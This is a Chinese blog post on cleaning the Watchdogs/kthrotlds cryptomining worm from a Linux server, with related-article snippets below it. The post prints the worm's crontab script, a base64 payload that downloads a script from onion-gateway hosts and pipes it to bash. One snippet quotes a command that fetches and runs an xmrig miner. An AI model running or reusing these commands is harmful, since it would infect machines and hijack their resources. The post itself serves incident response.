解决Watchdogs 、kthrotlds 挖矿蠕虫

最新推荐文章于 2024-01-20 08:42:02 发布
最新推荐文章于 2024-01-20 08:42:02 发布
阅读量1k 收藏
点赞数
分类专栏: linux 文章标签: Watchdogs 、kthrotlds 挖矿蠕虫
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010576019/article/details/101349364
版权

在最近开发项目部署过程中,发现项目运行缓慢,人员数过多情况下系统卡死。
查看服务器,top命令发现服务器中毒
中毒了crontab -l 命令后发现也存在定时调度,打开定时调度文件/root/.systemd-init
发现文件为base64编码,我靠。文件如下:
#!/bin/bash
exec &>/dev/null
sleep 119
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdSgpIHsKeD0vY3JuCndnZXQgLXQxIC1UMTgwIC1xVS0gLU8tIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgJDEkeCB8fCBjdXJsIC1tMTgwIC1mc1NMa0EtICQxJHgKfQppZiAhIGxzIC9wcm9jLyQoY2F0IC90bXAvLlgxMS11bml4LzApL2lvOyB0aGVuCigKdSBpbnRlbGJhZ2pvcDduem01LnRvcjJ3ZWIuaW8gfHwKdSBpbnRlbGJhZ2pvcDduem01LmQyd2ViLm9yZyB8fAp1IGludGVsYmFnam9wN256bTUub25pb24uaW4ubmV0IHx8CnUgaW50ZWxiYWdqb3A3bnptNS5vbmlvbi5nbGFzcyB8fAp1IGludGVsYmFnam9wN256bTUub25pb24ubW4gfHwKdSBpbnRlbGJhZ2pvcDduem01Lm9uaW9uLnNoIHx8CnUgaW50ZWxiYWdqb3A3bnptNS5vbmlvbi50bwopfGJhc2gKZmkK|base64 -d|bash
不要紧,解码看看源码
解码定时文件意思明确,查找文件是否存在,不存在就下载一堆东西到/tmp下面。对于菜鸟的我,直接kill 病毒进程,直接删掉/tmp下的所有内容.crontab -r 删掉定时调度,删掉这个定时文件/root/.systemd-init。但是跟踪了一下,20分钟后又给启动了。
ps -ef 病毒进程,看不到病毒文件所在位置,很困惑,怀疑病毒劫持了ps命令。
折腾很久,百度一下发现这是2019年2月爆发的Watchdogs 、kthrotlds 挖矿蠕虫
git上给出如下解决方案,终于搞定,两个脚本完成,如果在执行脚本中发现不能执行的问题,请用chattr -i 不能执行的文件。
https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool

u010576019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kthrotlds kill.zip
05-14
将busybox放在/bin下,运行clear,转载于某大神
linux服务器排查病毒kthroltlds的经过
elvismelody的博客
05-15 4816
服务器报病毒 查了种种资料,原来ThinkPHP和Supervisord和Nexus Repository Manager 3的产品旧版本有漏洞, 我就是装了maven nexus 3, 有漏洞被入侵了,这是变种病毒:kthroltlds 看看top任务栏有哪些可疑的地方: ps-aux--sort=-pcpu|head-10 得到: python2直接ex...
Redis数据库未授权访问及安全组漏洞kthrotlds
Jan_My31的博客
05-27 570
打开电脑,打开navicat,查看昨天的数据,给我来这么一下,已经不止一次给我要比特币。数据不值钱,但是你已经搞过我两次啦。 To recover your lost Database and avoid leaking it: Send us 0.05 Bitcoin (BTC) to our Bitcoin address 38J6T4h6FozuBQTPrhdwoTHgQf5arK4jRj ...
记录一次watchdog被
buzenmedi的专栏
06-29 638
突然发现机器cpu很高,一看cpu飙到60% 查了一下进程发现可疑的进程,给干掉了,cpu恢复正常 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxf
如何更有效的消灭watchdogs病毒?华为云DCS Redis为您支招
weixin_34319999的博客
02-27 271
2019独角兽企业重金招聘Python工程师标准>>> ...
WatchDogs-Hack
07-06
WatchDogs-Hack》项目是一个利用C++和MASM64汇编语言进行编程的黑客工具,旨在模拟游戏《看门狗》中的黑客技术。这个项目由两个主要部分组成,一部分是基于D3D(Direct3D)的基础框架,这部分可能涉及到图形渲染和...
watchdogs:关注网络世界的变化,一切都可以RSS
05-30
通过pip顺利部署: pip install -U watchdogs;python3 -m watchdogs 使用 Web UI 轻松创建新的爬虫,而不是像编写重复代码的旧方法。 所有的爬虫都在异步环境中运行。 几乎所有元素都有一个title属性来描述 Web UI ...
Python库 | watchdogs-1.6.9-py3-none-any.whl
03-25
`watchdogs-1.6.9-py3-none-any.whl` 是一个针对 Python 开发的库,名为 `watchdogs` 的版本 1.6.9。这个文件是一种特殊格式的归档,用于分发和安装 Python 包,称为 wheel 文件。在 Python 的生态系统中,wheel ...
Python库 | watchdogs-1.8.7-py3-none-any.whl
05-11
资源分类:Python库 所属语言:Python 资源全名:watchdogs-1.8.7-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | watchdogs-1.8.4-py3-none-any.whl
05-11
资源分类:Python库 所属语言:Python 资源全名:watchdogs-1.8.4-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Simulink 的看门狗定时器和计数器:如果仿真运行时间过长或时间步长过多,则会触发错误。-matlab开发
05-30
在提供的文件"watchdogs.zip"中,可能包含了关于如何设置和使用Simulink的看门狗定时器和计数器的示例模型或文档。解压并研究这些文件,可以帮助你更深入地理解和应用这些工具,从而提高仿真效率和准确性。 总的来...
服务器上的木马怎么清理.docx
12-17
在服务器管理中,遇到标题所描述的情况,即服务器性能异常,CPU和内存占用极高,以及疑似存在木马的情况,需要采取一系列步骤来诊断和解决问题。根据描述和标签,我们可以确定这是关于服务器安全和CS(可能指...
watchdogTimer:Windows看门狗计时器模拟
02-12
watchdogs / 1. $ WDSTATE $的文件中写入“ 0”和“ 1”。 由于这是一个github存储库,而这是python,因此您始终可以阅读代码,以帮助您判断是否运行该程序:)那么,log.bin文件是用来做什么的? 当看门狗计时器未...
WDAnimationcxair:引导和关闭动画切换器Magisk模块以支持任何受支持的android设备
05-11
WatchDogs的所有真实和官方三个版本的启动动画以及一些其他很酷的启动动画都是从其来源中纯粹提取的,用于任何受支持的android设备。 从该模块中所有可用的启动动画中,使用所需的一种,将启动动画和关闭动画更改为...
公共看门狗程序.zip
10-21
在压缩包文件"watchdogs"中,很可能包含了实现这个看门狗程序的源代码、配置示例或其他相关文件。用户可以查看和学习这些文件,了解如何利用Qt库构建类似的看门狗解决方案。 总之,"公共看门狗程序"是一个利用Qt库...
服务器(Linux)木马病毒(kswapd0进程使cpu爆满)
热门推荐
小韩的博客
04-03 2万+
服务器(Linux)木马病毒(kswapd0进程使cpu爆满)
应急响应-病毒(kswapd0)
weixin_45690589的博客
10-10 1147
应急响应-病毒(kswapd0)
centos kswapd0 木马病毒进程CPU100解决
最新发布
1193379199的博客
01-20 1069
很多病毒都是有会在定时任务里面,以至于很难清理清楚。(由于我的服务器买油开启定时任务服务,所以里面没有任务)2.1 执行命令netstat -antlp | grep kswapd0 查询该进程的网络信息。主要是由于kswapd0进程在作怪,占据了99%以上的CUP,查找资料后,发现它就是进程。最好把木马程序和定时任务都清理完了再杀掉,要不然还会自动重启。1.在系统里面top一下,查看了所有进程。2.排查kswapd0进程。7.杀掉kswapd0进程。4.查看进程的工作空间。
linux处理kdevtmpfsi,kswapd0(病毒清除)
bluesease的博客
12-12 2972
kdevtmpfsi,kswapd0病毒问题处理
怎么使用看门狗对多个任务进行监测
06-03
observers[0].schedule(watchdogs[0], path='.', recursive=True) observers[1].schedule(watchdogs[1], path='.', recursive=True) observers[0].start() observers[1].start() while True: for i, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值